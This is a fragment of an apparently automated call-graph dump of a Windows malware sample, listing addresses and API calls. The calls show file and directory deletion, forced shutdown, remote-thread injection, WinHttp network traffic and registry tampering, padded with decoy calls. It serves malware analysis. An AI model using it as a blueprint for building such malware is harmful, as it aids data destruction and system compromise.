3877->3876 3878 62730 GetProcessHeap HeapAlloc 3877->3878 3879 627a4 GetMenuCheckMarkDimensions 3878->3879 3880 627b1 3879->3880 3880->3879 3881 627cc wsprintfW GetFileAttributesW 3880->3881 3882 62810 GetProcessHeap HeapFree 3880->3882 3897 6e0ae 3880->3897 3881->3880 3881->3882 3882->3878 3883 6282f GetProcessHeap HeapFree GetProcessHeap HeapFree 3882->3883 3883->3868 3905 6c5be 3885->3905 3889 622b3 GetFileAttributesW 3890 622cf 3889->3890 3891 622c4 3889->3891 3924 61e16 8 API calls 3890->3924 3892 6e0ae 81 API calls 3891->3892 3892->3890 3894 622d4 Sleep 3953 61d22 GetProcessHeap HeapAlloc 3894->3953 3896 622e4 3898 6d97f 6 API calls 3897->3898 3899 6e0ba DeleteFileW 3898->3899 3900 6e0d3 3899->3900 3901 6e0cc 3899->3901 3902 6e0d9 GetProcessHeap HeapFree 3900->3902 3903 6e0e9 3900->3903 3904 6890f 78 API calls 3901->3904 3902->3903 3903->3880 3904->3900 3906 6c5c1 TerminateThread CloseHandle 3905->3906 3906->3906 3907 622ae 3906->3907 3908 6d4ca GetProcessHeap HeapAlloc 3907->3908 3909 6d524 GetDesktopWindow 3908->3909 3910 6d531 3909->3910 3910->3909 3911 6d550 CoInitialize 3910->3911 3912 6d752 GetProcessHeap HeapFree 3911->3912 3913 6d561 CoCreateInstance 3911->3913 3912->3889 3914 6d74c CoUninitialize 3913->3914 3915 6d580 3913->3915 3914->3912 3915->3914 3916 6d738 3915->3916 3917 6d70a CoTaskMemFree 3915->3917 3919 6d62b StrStrIW 3915->3919 3920 6d6fc CoTaskMemFree 3915->3920 3921 6d664 StrStrIW 3915->3921 3922 6d6f9 CoTaskMemFree 3915->3922 3923 6d6ad StrStrIW StrCpyNW GetFileAttributesW 3915->3923 3916->3914 3917->3915 3918 6d718 CoTaskMemFree 3917->3918 3918->3915 3919->3915 3919->3920 3920->3915 3921->3915 3922->3920 3923->3915 3925 61ecc GetCurrentProcessId 3924->3925 3926 61ed9 3925->3926 3926->3925 3927 61ef1 GetProcessHeap HeapAlloc 3926->3927 3928 61f73 GetCurrentProcessId 3927->3928 3929 61f80 3928->3929 3929->3928 3930 61f98 GetProfilesDirectoryW 3929->3930 3931 62199 GetProcessHeap HeapAlloc 3930->3931 3932 61fbd wsprintfW FindFirstFileW 3930->3932 3933 62209 GetDialogBaseUnits 3931->3933 3932->3931 3941 61feb 3932->3941 3934 62216 3933->3934 3934->3933 3936 6222e ExpandEnvironmentStringsW 3934->3936 3935 61fed StrCmpW 3937 62171 FindNextFileW 3935->3937 3938 62007 StrCmpW 3935->3938 3939 6ddbf 48 API calls 3936->3939 3940 62183 FindClose 3937->3940 3937->3941 3938->3937 3942 62021 3938->3942 3944 62247 12 API calls 3939->3944 3940->3941 3941->3931 3941->3935 3941->3937 3943 6204a StrCpyW GetProcessHeap HeapAlloc 3942->3943 3945 62072 GetProcessWindowStation 3943->3945 3944->3894 3946 6207f 3945->3946 3946->3945 3947 62099 StrCatW GetProcessHeap HeapAlloc 3946->3947 3948 620ef GetDoubleClickTime 3947->3948 3949 620fc 3948->3949 3949->3948 3950 62114 wsprintfW 3949->3950 3959 6ddbf 3950->3959 3954 61d83 GetMenuCheckMarkDimensions 3953->3954 3955 61d90 3954->3955 3955->3954 3956 61da8 GetCurrentProcess OpenProcessToken LookupPrivilegeValueA AdjustTokenPrivileges ExitWindowsEx 3955->3956 3957 61e03 GetProcessHeap HeapFree 3956->3957 3958 61dfd ExitWindowsEx 3956->3958 3957->3896 3958->3957 3960 6d97f 6 API calls 3959->3960 3961 6ddd9 lstrlenW GetProcessHeap HeapAlloc 3960->3961 3962 6de14 GetProcessHeap HeapAlloc 3961->3962 3963 6e096 3961->3963 3966 6de34 GetProcessHeap HeapAlloc 3962->3966 3967 6e087 3962->3967 3964 62139 GetProcessHeap HeapFree GetProcessHeap HeapFree 3963->3964 3965 6e09d GetProcessHeap HeapFree 3963->3965 3964->3941 3964->3943 3965->3964 3969 6e07d GetProcessHeap HeapFree 3966->3969 3970 6de4e lstrcpyW GetProcessHeap HeapAlloc 3966->3970 3967->3963 3968 6e08e GetProcessHeap HeapFree 3967->3968 3968->3963 3969->3967 3971 6de87 GetProcessWindowStation 3970->3971 3972 6de94 3971->3972 3972->3971 3973 6deb3 lstrcatW lstrcpyW GetProcessHeap HeapAlloc 3972->3973 3974 6df0c GetOpenClipboardWindow 3973->3974 3975 6df19 3974->3975 3975->3974 3976 6df38 lstrcatW FindFirstFileW 3975->3976 3980 6df66 3976->3980 3983 6df5e 3976->3983 3977 6e031 FindNextFileW 3979 6e05a 6 API calls 3977->3979 3977->3980 3978 6df7e lstrlenW 3978->3980 3981 6df95 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 3978->3981 3979->3969 3980->3977 3980->3978 3980->3979 3982 6dfe9 lstrcatW 3980->3982 3986 6ddbf 6 API calls 3980->3986 3987 6e011 RemoveDirectoryW 3980->3987 3988 6e051 GetLastError 3980->3988 3981->3983 3984 6dfc0 lstrcpyW lstrcatW 3981->3984 3982->3980 3985 6e01c DeleteFileW 3982->3985 3983->3979 3984->3982 3985->3980 3986->3980 3987->3980 3988->3983 3990 64aab GetProcessHeap HeapAlloc GetCurrentProcessId CreateThread CloseHandle 3989->3990 3991 648c2 3989->3991 3990->3797 3991->3990 3992 648ca OpenProcess 3991->3992 3993 648ea OpenProcessToken 3992->3993 3994 64a96 GetProcessHeap HeapFree GetProcessHeap HeapFree 3992->3994 3995 64911 3993->3995 3996 6491a ProcessIdToSessionId 3993->3996 3994->3990 3995->3996 3997 64a8a CloseHandle 3995->3997 3998 6492f GetTokenInformation GetLastError 3996->3998 3999 64a81 CloseHandle 3996->3999 3997->3994 3998->3999 4000 64953 GetProcessHeap HeapAlloc 3998->4000 3999->3997 4000->3999 4001 6496c GetTokenInformation 4000->4001 4002 64a77 GetProcessHeap HeapFree 4001->4002 4003 64983 LookupAccountSidW 4001->4003 4002->3999 4003->4002 4004 649ab GetProcessHeap HeapAlloc 4003->4004 4005 64a20 GetCursor 4004->4005 4006 64a2d 4005->4006 4006->4005 4007 64a45 wsprintfW GetProcessHeap HeapFree 4006->4007 4007->4002 4009 6cfa8 CreateFileW 4008->4009 4010 6d05f Sleep 4009->4010 4011 6cfcf ReadFile 4009->4011 4010->4009 4012 6d042 CloseHandle 4011->4012 4015 6cfec 4011->4015 4013 6d9f1 17 API calls 4012->4013 4014 6d05a 4013->4014 4014->4010 4016 6d06f Sleep 4014->4016 4015->4012 4015->4015 4017 6d01d ReadFile 4015->4017 4016->3810 4016->3815 4017->4015 4019 6d10f GetCapture 4018->4019 4020 6d11c 4019->4020 4020->4019 4021 6d13b WSAStartup 4020->4021 4022 6d160 4021->4022 4023 6d2f6 4022->4023 4024 6d1b4 GetProcessHeap HeapAlloc 4022->4024 4030 6d2cc GetProcessHeap HeapFree 4022->4030 4031 6d31b 4022->4031 4033 6482b 2 API calls 4022->4033 4036 6d2f8 4022->4036 4026 6d332 GetProcessHeap HeapFree 4023->4026 4025 6d20e GetCurrentThreadId 4024->4025 4027 6d21b 4025->4027 4026->3815 4027->4025 4028 6d236 wsprintfA 4027->4028 4045 6314d 4028->4045 4030->4022 4032 6482b 2 API calls 4031->4032 4034 6d323 GetProcessHeap HeapFree 4032->4034 4035 6d282 Sleep 4033->4035 4034->4023 4035->4030 4051 647d4 4036->4051 4039 6482b 2 API calls 4040 6d30d GetProcessHeap HeapFree 4039->4040 4040->4026 4042 64832 4041->4042 4043 64852 4041->4043 4042->4043 4044 6483a GetProcessHeap HeapFree 4042->4044 4043->3815 4044->4043 4046 6315f 4045->4046 4048 63183 4046->4048 4056 6298e 4046->4056 4049 6318e 4048->4049 4050 6482b 2 API calls 4048->4050 4049->4022 4050->4049 4052 647de 4051->4052 4055 64811 4051->4055 4053 647ef GetProcessHeap HeapFree 4052->4053 4054 647fd GetProcessHeap HeapAlloc 4052->4054 4052->4055 4053->4054 4054->4055 4055->4039 4057 629c4 gethostbyname 4056->4057 4059 62a31 4057->4059 4073 62a29 4057->4073 4060 62c68 4059->4060 4061 62a56 GetProcessHeap HeapAlloc 4059->4061 4062 62c84 lstrlenA GetProcessHeap HeapAlloc MultiByteToWideChar 4060->4062 4063 62c6c 4060->4063 4064 62c05 GetTickCount 4061->4064 4065 62cb6 WinHttpConnect GetProcessHeap HeapAlloc 4062->4065 4063->4065 4066 62c12 4064->4066 4067 62d2f GetMessageTime 4065->4067 4066->4064 4068 62c30 WinHttpOpen 4066->4068 4069 62d3c 4067->4069 4070 62c49 WinHttpSetTimeouts GetProcessHeap HeapFree 4068->4070 4071 62c73 GetProcessHeap HeapFree 4068->4071 4069->4067 4072 62d5a wsprintfW GetProcessHeap HeapFree 4069->4072 4070->4060 4071->4073 4074 62d8a 4072->4074 4075 63128 GetProcessHeap HeapFree 4072->4075 4073->4046 4076 62d96 lstrlenA GetProcessHeap HeapAlloc MultiByteToWideChar 4074->4076 4077 62d91 4074->4077 4075->4073 4078 6313b WinHttpCloseHandle 4075->4078 4079 62dce GetProcessHeap HeapAlloc 4076->4079 4077->4079 4078->4073 4080 62e08 GetDesktopWindow 4079->4080 4081 62e15 4080->4081 4081->4080 4082 62e2d WinHttpOpenRequest GetProcessHeap HeapFree 4081->4082 4083 62e65 4082->4083 4104 63069 4082->4104 4105 635a5 WinHttpGetIEProxyConfigForCurrentUser 4083->4105 4086 62eb1 WinHttpSetOption WinHttpSetOption 4090 62edf GetProcessHeap HeapAlloc 4086->4090 4091 62fbd WinHttpSendRequest 4086->4091 4087 62e8e WinHttpSetOption 4087->4086 4088 63113 GetProcessHeap HeapFree 4088->4075 4089 6310c WinHttpCloseHandle 4089->4088 4092 62f47 GetDialogBaseUnits 4090->4092 4093 62fd5 WinHttpReceiveResponse 4091->4093 4091->4104 4094 62f54 4092->4094 4095 62fe6 WinHttpQueryHeaders 4093->4095 4093->4104 4094->4092 4096 62f6c wsprintfW lstrlenW WinHttpAddRequestHeaders GetProcessHeap HeapFree 4094->4096 4097 63023 4095->4097 4098 6302b WinHttpQueryHeaders 4095->4098 4096->4091 4097->4098 4099 6305d 4098->4099 4100 6307e GetProcessHeap HeapAlloc 4099->4100 4103 6309c 4099->4103 4099->4104 4100->4103 4101 630a6 WinHttpQueryDataAvailable 4102 630b9 WinHttpReadData 4101->4102 4101->4104 4102->4103 4102->4104 4103->4101 4103->4104 4104->4088 4104->4089 4106 635ee 4105->4106 4107 63899 4105->4107 4143 63551 4106->4143 4109 638ac 4107->4109 4110 638a7 GlobalFree 4107->4110 4111 638b6 4109->4111 4112 638b3 GlobalFree 4109->4112 4110->4109 4115 638bc GlobalFree 4111->4115 4116 62e8a 4111->4116 4112->4111 4113 635fb 4113->4107 4114 63616 WinHttpOpen 4113->4114 4125 636e2 4113->4125 4117 6362f WinHttpGetProxyForUrl 4114->4117 4114->4125 4115->4116 4116->4086 4116->4087 4120 63681 4117->4120 4121 636bf WinHttpCloseHandle 4117->4121 4118 6371b 4127 63729 StrCpyW 4118->4127 4128 63738 GetProcessHeap HeapAlloc 4118->4128 4120->4121 4124 63687 StrCpyW WinHttpCloseHandle 4120->4124 4122 636d7 4121->4122 4123 636d2 GlobalFree 4121->4123 4122->4125 4126 636dd GlobalFree 4122->4126 4123->4122 4129 636a6 GlobalFree 4124->4129 4130 636ab 4124->4130 4125->4107 4125->4118 4133 636f5 PathMatchSpecW 4125->4133 4126->4125 4127->4107 4131 6378b GetDoubleClickTime 4128->4131 4129->4130 4130->4107 4132 636b5 GlobalFree 4130->4132 4134 63798 4131->4134 4132->4107 4133->4107 4133->4125 4134->4131 4135 637ba GetProcessHeap HeapAlloc 4134->4135 4136 637f7 GetCurrentThreadId 4135->4136 4137 63804 4136->4137 4137->4136 4138 6381c StrStrIW 4137->4138 4139 63844 4138->4139 4140 6384a StrStrIW 4139->4140 4141 6387d GetProcessHeap HeapFree GetProcessHeap HeapFree 4139->4141 4142 638ca StrCpyW GetProcessHeap HeapFree GetProcessHeap HeapFree 4139->4142 4140->4139 4141->4107 4142->4107 4144 6357d 4143->4144 4144->4144 4145 63588 WinHttpCrackUrl 4144->4145 4145->4113 4147 6c5be 2 API calls 4146->4147 4148 6d359 TerminateProcess CloseHandle 4147->4148 4149 68761 17 API calls 4148->4149 4150 6d384 ExitProcess 4149->4150 4152 63e58 4151->4152 4153 6345c 4151->4153 4237 63950 4152->4237 4153->3830 4178 63300 4153->4178 4156 638f7 2 API calls 4157 63e6b 4156->4157 4158 63e76 GetProcessHeap HeapAlloc 4157->4158 4159 6410f GetProcessHeap HeapFree 4157->4159 4160 63eed GetTickCount 4158->4160 4159->4153 4161 63efa 4160->4161 4161->4160 4162 63f19 wsprintfW 4161->4162 4163 63f4f GetProcessHeap HeapAlloc 4162->4163 4164 63f86 GetCaretBlinkTime 4163->4164 4165 63f93 4164->4165 4165->4164 4166 63fb5 wsprintfW 4165->4166 4167 638f7 2 API calls 4166->4167 4174 63fee 4167->4174 4168 63ffc RegQueryValueExW 4171 64074 RegCloseKey 4168->4171 4172 64027 GetProcessHeap HeapAlloc 4168->4172 4169 640e1 GetProcessHeap HeapFree 4169->4163 4170 640f9 RegCloseKey GetProcessHeap HeapFree 4169->4170 4170->4159 4171->4169 4171->4174 4173 6403c RegQueryValueExW 4172->4173 4172->4174 4173->4171 4173->4174 4174->4168 4174->4169 4174->4171 4175 64096 GetProcessHeap HeapAlloc 4174->4175 4176 640a4 GetProcessHeap HeapReAlloc 4174->4176 4177 640b7 GetProcessHeap HeapFree 4175->4177 4176->4177 4177->4169 4179 633c7 4178->4179 4180 6331f 4178->4180 4179->3830 4179->3831 4180->4179 4248 6ea7f 4180->4248 4182 633bd 4184 6482b 2 API calls 4182->4184 4183 6336d lstrcpyA 4186 633a6 4183->4186 4184->4179 4185 633ab lstrcpyA 4185->4186 4186->4182 4186->4185 4189 6321f GetCapture 4188->4189 4190 6322c 4189->4190 4190->4189 4191 6324b 4190->4191 4194 632d8 GetProcessHeap HeapFree 4191->4194 4195 632a3 Sleep 4191->4195 4262 6b964 4191->4262 4194->3830 4195->4191 4197 6ba40 GetShellWindow 4196->4197 4198 6ba4d 4197->4198 4198->4197 4199 6ba6c GetProcessHeap HeapAlloc 4198->4199 4200 6bab6 GetMessageTime 4199->4200 4201 6bac3 4200->4201 4201->4200 4202 6bae2 GetModuleHandleA GetProcAddress 4201->4202 4203 63e17 39 API calls 4202->4203 4204 6bb01 4203->4204 4205 6482b 2 API calls 4204->4205 4206 6bb1a GetProcessHeap HeapFree GetProcessHeap HeapFree 4205->4206 4206->3830 4213 62926 4207->4213 4208 6314d 91 API calls 4208->4213 4209 62977 4210 6482b 2 API calls 4209->4210 4212 6297e 4210->4212 4211 62933 Sleep 4214 6482b 2 API calls 4211->4214 4212->3830 4213->4208 4213->4209 4213->4211 4213->4212 4214->4213 4216 63e0d 4215->4216 4217 63b17 4215->4217 4216->3830 4217->4216 4218 63950 9 API calls 4217->4218 4219 63b39 4218->4219 4220 638f7 2 API calls 4219->4220 4221 63b45 4220->4221 4222 63b50 GetProcessHeap HeapAlloc 4221->4222 4223 63e01 GetProcessHeap HeapFree 4221->4223 4224 63bdf GetTickCount 4222->4224 4223->4216 4225 63bec 4224->4225 4225->4224 4226 63c0b wsprintfW 4225->4226 4227 63c52 GetProcessHeap HeapAlloc 4226->4227 4228 63c6d GetCaretBlinkTime 4227->4228 4229 63c7a 4228->4229 4229->4228 4230 63c92 wsprintfW RegDeleteValueW GetProcessHeap HeapFree 4229->4230 4230->4227 4232 63cea 4230->4232 4231 63de7 RegCloseKey GetProcessHeap HeapFree 4231->4223 4232->4231 4233 63d1e GetProcessHeap HeapAlloc 4232->4233 4234 63d39 GetCaretBlinkTime 4233->4234 4235 63d46 4234->4235 4235->4234 4236 63d5e wsprintfW RegSetValueExW GetProcessHeap HeapFree 4235->4236 4236->4231 4236->4233 4238 63964 GetVersion 4237->4238 4239 63ad7 4237->4239 4240 63a0f GetProcessHeap HeapAlloc 4238->4240 4241 6397f GetProcessHeap HeapAlloc 4238->4241 4239->4156 4242 63a8a GetForegroundWindow 4240->4242 4243 639c8 GetCurrentProcessId 4241->4243 4244 63a97 4242->4244 4245 639d5 4243->4245 4244->4242 4246 639f4 GetProcessHeap HeapFree 4244->4246 4245->4243 4245->4246 4246->4239 4249 6ea9f 4248->4249 4250 63332 4248->4250 4249->4250 4251 6eacb GetProcessHeap HeapAlloc 4249->4251 4250->4179 4250->4182 4250->4183 4252 6eb2b GetTickCount 4251->4252 4253 6eb38 4252->4253 4253->4252 4254 6eb53 GetProcessHeap HeapAlloc 4253->4254 4255 6eb8d GetShellWindow 4254->4255 4256 6eb9a 4255->4256 4256->4255 4257 6ebb9 LoadLibraryA GetProcAddress GetProcessHeap HeapAlloc 4256->4257 4258 6ec00 4257->4258 4259 6ec25 4258->4259 4261 6ec5a GetProcessHeap HeapFree 4258->4261 4260 6ec33 GetProcessHeap HeapFree GetProcessHeap HeapFree 4259->4260 4260->4250 4261->4260 4266 6b97b 4262->4266 4263 6314d 91 API calls 4263->4266 4264 6b9a7 Sleep 4264->4266 4265 6b9dd 4265->4191 4266->4263 4266->4264 4266->4265 4267 6482b 2 API calls 4266->4267 4267->4266 4312 64d73 OpenProcess 4313 64e40 4312->4313 4314 64dae GetCurrentProcess 4312->4314 4322 64c1f GetProcessHeap HeapAlloc 4314->4322 4316 64df2 4317 64c1f 12 API calls 4316->4317 4319 64dff 4316->4319 4317->4319 4320 64e2e CloseHandle CloseHandle 4319->4320 4321 64e20 Sleep 4319->4321 4331 69240 GetVersion 4319->4331 4320->4313 4321->4319 4321->4320 4323 64c7d GetMessageTime 4322->4323 4324 64c8a 4323->4324 4324->4323 4325 64cac GetProcessHeap HeapAlloc 4324->4325 4326 64ceb IsSystemResumeAutomatic 4325->4326 4327 64cf8 4326->4327 4327->4326 4328 64d17 GetModuleHandleA GetProcAddress 4327->4328 4329 64d32 GetProcessHeap HeapFree GetProcessHeap HeapFree 4328->4329 4329->4316 4332 69274 4331->4332 4333 69294 4332->4333 4334 6f995 37 API calls 4332->4334 4333->4319 4335 692cd 4334->4335 4336 693dd 4335->4336 4337 6f6f4 24 API calls 4335->4337 4338 693f0 4336->4338 4339 6f859 24 API calls 4336->4339 4341 692e9 4337->4341 4338->4333 4340 693f6 CloseHandle 4338->4340 4339->4338 4340->4333 4341->4336 4342 693ab 4341->4342 4344 6939d 4341->4344 4376 68bb1 4342->4376 4348 68f05 4344->4348 4346 693a9 4346->4336 4406 69408 GetVersion 4346->4406 4349 68f23 4348->4349 4350 68f41 GetProcessHeap HeapAlloc 4348->4350 4349->4350 4361 69065 4349->4361 4351 68f8f GetShellWindow 4350->4351 4352 68f9c 4351->4352 4352->4351 4353 68fb4 GetProcessHeap HeapAlloc 4352->4353 4354 69006 GetMessagePos 4353->4354 4355 69013 4354->4355 4355->4354 4356 6902b 4355->4356 4471 685e0 4356->4471 4359 6904f GetProcessHeap HeapFree GetProcessHeap HeapFree 4359->4361 4360 6906d GetProcessHeap HeapAlloc 4362 690c3 GetCaretBlinkTime 4360->4362 4361->4346 4363 690d0 4362->4363 4363->4362 4364 690e8 4363->4364 4365 685e0 77 API calls 4364->4365 4366 690f6 4365->4366 4367 6910f 6 API calls 4366->4367 4368 6913a GetProcessHeap HeapAlloc 4366->4368 4367->4361 4369 6918f GetCapture 4368->4369 4370 6919c 4369->4370 4370->4369 4371 691b4 4370->4371 4372 685e0 77 API calls 4371->4372 4373 691c2 4372->4373 4374 691db GetProcessHeap HeapFree GetProcessHeap HeapFree GetProcessHeap 4373->4374 4375 691fc 8 API calls 4373->4375 4374->4375 4375->4361 4377 68bea GetProcessHeap HeapAlloc 4376->4377 4378 68bcc 4376->4378 4379 68c38 GetShellWindow 4377->4379 4378->4377 4384 68c7d 4378->4384 4380 68c45 4379->4380 4380->4379 4381 68c5d GetModuleHandleA 4380->4381 4382 68c71 GetProcessHeap HeapFree 4381->4382 4383 68c85 GetProcessHeap HeapAlloc 4381->4383 4382->4384 4385 68cd1 GetMessagePos 4383->4385 4384->4346 4386 68cde 4385->4386 4386->4385 4387 68cf6 4386->4387 4558 677d7 4387->4558 4390 68d34 GetProcessHeap HeapAlloc 4392 68d8a GetCaretBlinkTime 4390->4392 4391 68d19 GetProcessHeap HeapFree GetProcessHeap HeapFree 4391->4384 4393 68d97 4392->4393 4393->4392 4394 68daf 4393->4394 4395 677d7 29 API calls 4394->4395 4396 68db9 4395->4396 4397 68e00 GetProcessHeap HeapAlloc 4396->4397 4398 68dd5 6 API calls 4396->4398 4399 68e55 GetCapture 4397->4399 4398->4397 4400 68e62 4399->4400 4400->4399 4401 68e7a 4400->4401 4402 677d7 29 API calls 4401->4402 4403 68e84 4402->4403 4404 68ea0 GetProcessHeap HeapFree GetProcessHeap HeapFree GetProcessHeap 4403->4404 4405 68ec1 8 API calls 4403->4405 4404->4405 4405->4384 4407 69440 4406->4407 4408 69431 CloseHandle 4406->4408 4409 69a43 4407->4409 4410 6945a 4407->4410 4408->4407 4411 69aa0 GetProcessHeap HeapAlloc 4409->4411 4412 69a4e CreateRemoteThread 4409->4412 4416 69891 4410->4416 4419 69469 4410->4419 4415 69aec GetShellWindow 4411->4415 4413 69a93 GetLastError 4412->4413 4414 69a69 WaitForSingleObject 4412->4414 4421 69846 4413->4421 4417 69a81 GetExitCodeThread 4414->4417 4414->4421 4418 69af9 4415->4418 4420 698a5 GetProcessHeap HeapAlloc 4416->4420 4416->4421 4417->4421 4418->4415 4422 69b14 GetProcessHeap HeapAlloc 4418->4422 4419->4421 4591 680d2 4419->4591 4423 698f1 GetShellWindow 4420->4423 4421->4336 4427 69b70 GetKBCodePage 4422->4427 4426 698fe 4423->4426 4426->4423 4428 69919 GetProcessHeap HeapAlloc 4426->4428 4430 69b7d 4427->4430 4431 69975 GetKBCodePage 4428->4431 4429 694d4 GetShellWindow 4433 694e1 4429->4433 4430->4427 4432 69b9a GetModuleHandleA GetProcAddress 4430->4432 4434 69982 4431->4434 4436 69c05 GetProcessHeap HeapFree GetProcessHeap HeapFree 4432->4436 4439 69bb1 4432->4439 4433->4429 4435 69506 GetProcessHeap HeapAlloc 4433->4435 4434->4431 4437 6999f 4434->4437 4438 6955d GetMessagePos 4435->4438 4436->4421 4440 680d2 122 API calls 4437->4440 4441 6956a 4438->4441 4443 69bd6 WaitForSingleObject 4439->4443 4444 69bfc 4439->4444 4442 699a4 4440->4442 4441->4438 4445 69587 4441->4445 4448 685e0 77 API calls 4442->4448 4447 69beb GetExitCodeThread 4443->4447 4450 69bf8 4443->4450 4446 6f4a9 12 API calls 4444->4446 4449 685e0 77 API calls 4445->4449 4446->4450 4447->4450 4451 699b2 GetProcessHeap HeapFree GetProcessHeap HeapFree 4448->4451 4452 69595 4449->4452 4450->4436 4451->4421 4453 695a8 GetProcessHeap HeapAlloc 4452->4453 4454 69810 GetProcessHeap HeapFree GetProcessHeap HeapFree 4452->4454 4455 6960b GetShellWindow 4453->4455 4454->4421 4456 69618 4455->4456 4456->4455 4457 69631 4456->4457 4457->4457 4458 6969d GetProcessHeap HeapAlloc 4457->4458 4459 697f2 4457->4459 4461 696f2 GetClipboardViewer 4458->4461 4460 6f4a9 12 API calls 4459->4460 4462 697f9 4460->4462 4463 696ff 4461->4463 4464 697fb GetProcessHeap HeapFree 4462->4464 4463->4461 4465 69724 GetProcessHeap HeapAlloc 4463->4465 4464->4454 4466 69784 GetCursor 4465->4466 4467 69791 4466->4467 4467->4466 4468 697ae 4467->4468 4469 685e0 77 API calls 4468->4469 4470 697bc GetProcessHeap HeapFree GetProcessHeap HeapFree 4469->4470 4470->4464 4482 6849d 4471->4482 4474 6860f VirtualAlloc 4475 6869e 4474->4475 4477 6862a 4474->4477 4475->4359 4475->4360 4478 68669 4477->4478 4496 67a57 4477->4496 4510 61b2b 4478->4510 4483 674d8 15 API calls 4482->4483 4484 684bc 4483->4484 4514 67c11 GetProcessHeap HeapAlloc 4484->4514 4486 684cb VirtualAlloc 4488 684ed 4486->4488 4495 685a0 4486->4495 4487 67c11 68 API calls 4487->4488 4488->4487 4491 68534 4488->4491 4492 6850b VirtualFree VirtualAlloc 4488->4492 4489 685c9 VirtualFree 4490 685d7 4489->4490 4490->4474 4490->4475 4493 68560 lstrcmpiA 4491->4493 4494 6857d lstrcmpiA 4491->4494 4491->4495 4492->4488 4492->4491 4493->4491 4493->4495 4494->4491 4494->4495 4495->4489 4495->4490 4497 67a7a GetCurrentProcessId 4496->4497 4498 67a8e 4496->4498 4547 67a0e 4497->4547 4499 67bd7 4498->4499 4500 67a9e GetProcessHeap HeapAlloc 4498->4500 4505 67c08 4499->4505 4506 67c01 CloseHandle 4499->4506 4502 67adf GetShellWindow 4500->4502 4503 67aec 4502->4503 4503->4502 4504 67b0b GetProcessHeap HeapAlloc 4503->4504 4507 67b6d DestroyCaret 4504->4507 4505->4477 4506->4505 4508 67b7a 4507->4508 4508->4507 4509 67b99 6 API calls 4508->4509 4509->4499 4511 61b3f 4510->4511 4512 61b99 VirtualFree 4511->4512 4513 61b6f lstrcmpA 4511->4513 4512->4475 4513->4511 4513->4512 4515 67c6f GetShellWindow 4514->4515 4516 67c7c 4515->4516 4516->4515 4517 67c9e GetProcessHeap HeapAlloc 4516->4517 4518 67d08 GetProcessWindowStation 4517->4518 4519 67d15 4518->4519 4519->4518 4520 67d30 4519->4520 4521 67d3f GetModuleHandleA 4520->4521 4522 67d5c 4520->4522 4521->4522 4523 67d81 4522->4523 4524 67d66 GetProcAddress 4522->4524 4525 67d91 4523->4525 4526 67d85 GetModuleHandleA 4523->4526 4524->4523 4527 67e4e 4525->4527 4528 67d9e GetProcessHeap HeapAlloc 4525->4528 4526->4525 4529 674d8 15 API calls 4527->4529 4530 67e02 GetProcessWindowStation 4528->4530 4533 67e59 4529->4533 4531 67e0f 4530->4531 4531->4530 4532 67e2a GetProcAddress GetProcessHeap HeapFree 4531->4532 4532->4527 4534 6808a GetProcessHeap HeapFree GetProcessHeap HeapFree 4533->4534 4536 67e82 GetProcessHeap HeapAlloc 4533->4536 4534->4486 4536->4534 4537 67e9d GetProcessHeap HeapAlloc 4536->4537 4538 67eb7 4537->4538 4539 68060 GetProcessHeap HeapFree 4537->4539 4541 67a57 26 API calls 4538->4541 4539->4534 4540 68076 GetProcessHeap HeapFree 4539->4540 4540->4534 4542 67ec8 4541->4542 4542->4539 4543 67a57 26 API calls 4542->4543 4544 67ee6 4543->4544 4544->4539 4545 67a57 26 API calls 4544->4545 4546 6804e 4544->4546 4545->4544 4546->4539 4550 678d6 GetProcessHeap HeapAlloc 4547->4550 4549 67a46 4549->4498 4551 67923 GetShellWindow 4550->4551 4552 67930 4551->4552 4552->4551 4553 67952 GetProcessHeap HeapAlloc 4552->4553 4554 67995 GetDoubleClickTime 4553->4554 4555 679a2 4554->4555 4555->4554 4556 679c1 GetModuleHandleA GetProcAddress 4555->4556 4557 679e3 GetProcessHeap HeapFree GetProcessHeap HeapFree 4556->4557 4557->4549 4575 686af GetProcessHeap HeapAlloc 4558->4575 4561 678cd 4561->4390 4561->4391 4562 61b2b lstrcmpA 4565 67803 4562->4565 4563 678bb GetProcessHeap HeapFree 4563->4561 4564 6784c CreateFileW 4566 6786e SetFilePointer 4564->4566 4568 678ad 4564->4568 4565->4563 4565->4564 4582 6765b 4565->4582 4570 67881 ReadFile 4566->4570 4571 678a6 CloseHandle 4566->4571 4567 678b8 4567->4563 4568->4567 4572 6765b 12 API calls 4568->4572 4570->4571 4574 67898 4570->4574 4571->4568 4572->4567 4574->4571 4577 677f1 4575->4577 4578 686e4 4575->4578 4576 686e7 GetModuleFileNameW 4576->4578 4579 68729 4576->4579 4577->4561 4577->4562 4578->4576 4578->4579 4580 686fc GetProcessHeap HeapFree GetProcessHeap HeapAlloc 4578->4580 4579->4577 4581 6873b GetLastError GetProcessHeap HeapFree 4579->4581 4580->4576 4580->4579 4581->4577 4583 6767c GetProcessHeap HeapAlloc 4582->4583 4590 677bc 4582->4590 4584 676ef GetProcessHeap 4583->4584 4585 676f8 4584->4585 4585->4584 4586 67713 GetProcessHeap HeapAlloc 4585->4586 4587 67752 IsSystemResumeAutomatic 4586->4587 4588 6775f 4587->4588 4588->4587 4589 6777e 6 API calls 4588->4589 4589->4590 4590->4564 4592 680f0 GetProcessHeap HeapAlloc 4591->4592 4604 68211 GetProcessHeap HeapAlloc 4591->4604 4593 68138 GetShellWindow 4592->4593 4594 68145 4593->4594 4594->4593 4595 68160 GetProcessHeap HeapAlloc 4594->4595 4596 681b6 CreatePopupMenu 4595->4596 4597 681c3 4596->4597 4597->4596 4598 681de 4597->4598 4599 685e0 77 API calls 4598->4599 4600 681ec 4599->4600 4601 68219 GetProcessHeap HeapAlloc 4600->4601 4602 681fc GetProcessHeap HeapFree GetProcessHeap HeapFree 4600->4602 4603 6826a CountClipboardFormats 4601->4603 4602->4604 4605 68277 4603->4605 4604->4429 4605->4603 4606 68292 4605->4606 4607 685e0 77 API calls 4606->4607 4608 682a0 4607->4608 4609 682b3 GetProcessHeap 4608->4609 4610 682de GetProcessHeap HeapAlloc 4608->4610 4612 682c0 HeapFree GetProcessHeap HeapFree GetProcessHeap HeapFree 4609->4612 4611 6832f GetMessageExtraInfo 4610->4611 4613 6833c 4611->4613 4612->4604 4613->4611 4614 68357 4613->4614 4615 685e0 77 API calls 4614->4615 4616 68365 4615->4616 4617 68378 GetProcessHeap HeapFree GetProcessHeap 4616->4617 4618 68398 GetProcessHeap HeapAlloc 4616->4618 4617->4612 4619 683ec GetLastError 4618->4619 4620 683f9 4619->4620 4620->4619 4621 68414 4620->4621 4622 685e0 